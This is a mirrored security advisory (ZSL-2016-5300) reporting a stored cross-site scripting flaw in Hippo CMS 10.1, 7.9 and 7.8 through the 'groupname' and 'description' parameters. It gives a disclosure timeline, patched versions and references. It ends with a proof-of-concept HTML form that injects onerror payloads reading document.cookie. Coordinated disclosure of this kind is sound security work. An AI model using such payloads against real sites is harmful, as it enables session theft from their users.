Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zeroscienceGjoko KrsticZSL-2016-5300
HistoryJan 30, 2016 - 12:00 a.m.

Hippo CMS 10.1 Stored Cross-Site Scripting Vulnerability

2016-01-3000:00:00
Gjoko Krstic
zeroscience.mk
118

5.9 Medium

AI Score

Confidence

High

JSON

Title: Hippo CMS 10.1 Stored Cross-Site Scripting Vulnerability
Advisory ID: ZSL-2016-5300
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 30.01.2016

Summary

Hippo CMS is an open source Java CMS. We built it so you can easily integrate it into your existing architecture.

Description

Hippo CMS suffers from a stored XSS vulnerability. Input passed thru the POST parameters ‘groupname’ and ‘description’ is not sanitized allowing the attacker to execute HTML code into user’s browser session on the affected site.

Vendor

Hippo B.V. - <http://www.onehippo.org>

Affected Version

10.1, 7.9 and 7.8 (Enterprise Edition)

Tested On

Linux 2.6.32-5-xen-amd64
Java/1.8.0_66
Apache-Coyote/1.1

Vendor Status

[04.12.2015] Vulnerability discovered.
[05.12.2015] Contact with the vendor.
[07.12.2015] Vendor responds asking more details.
[07.12.2015] Sent details to the vendor.
[07.12.2015] Vendor acknowledges the vulnerabilities scheduling patch release timeframe.
[18.12.2015] Vendor fixed the vulnerabilities instructing customers to update.
[29.01.2016] Vendor released security notice and version 10.1.2, 7.9.11 and 7.8.12 to address these issues.
[30.01.2016] Coordinated public security advisory released.

PoC

hippocms_xss.html

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://www.onehippo.org/security-issues-list/security-12.html&gt;
[2] <http://www.onehippo.org/about/release-notes/10/10.1.2-release-notes.html&gt;
[3] <http://www.onehippo.org/about/release-notes/7_9/7.9.11-release-notes.html&gt;
[4] <http://www.onehippo.org/about/release-notes/7_8/7.8.12-release-notes.html&gt;
[5] <https://cxsecurity.com/issue/WLB-2016010226&gt;
[6] <https://packetstormsecurity.com/files/135518&gt;
[7] <https://www.exploit-db.com/exploits/39391/&gt;

Changelog

[30.01.2016] - Initial release
[31.01.2016] - Added reference [5] and [6]
[01.02.2016] - Added reference [7]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<!--

Hippo CMS 10.1 Stored Cross-Site Scripting Vulnerability


Vendor: Hippo B.V.
Product web page: http://www.onehippo.org
Affected version: 10.1, 7.9 and 7.8 (Enterprise Edition)

Summary: Hippo CMS is an open source Java CMS. We
built it so you can easily integrate it into your
existing architecture.

Desc: Hippo CMS suffers from a stored XSS vulnerability.
Input passed thru the POST parameters 'groupname' and
'description' is not sanitized allowing the attacker to
execute HTML code into user's browser session on the
affected site.


Tested on: Linux 2.6.32-5-xen-amd64
           Java/1.8.0_66
           Apache-Coyote/1.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5300
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5300.php

Vendor: http://www.onehippo.org/security-issues-list/security-12.html
        http://www.onehippo.org/about/release-notes/10/10.1.2-release-notes.html


04.12.2015

--><html>
<body>
<form action="https://10.0.2.17/?1-1.IBehaviorListener.0-root-tabs-panel~container-cards-6-panel-panel-form-create~button" method="POST">
<input name="id26c_hf_0" type="hidden" value=""/>
<input name="groupname" type="hidden" value="&lt;img src=ko onerror=confirm(document.cookie)&gt;"/>
<input name="description" type="hidden" value="&lt;img src=ko onerror=confirm(2)&gt;"/>
<input name="create-button" type="hidden" value="1"/>
<input type="submit" value="Inject code"/>
</form>
</body>
</html>

5.9 Medium

AI Score

Confidence

High

JSON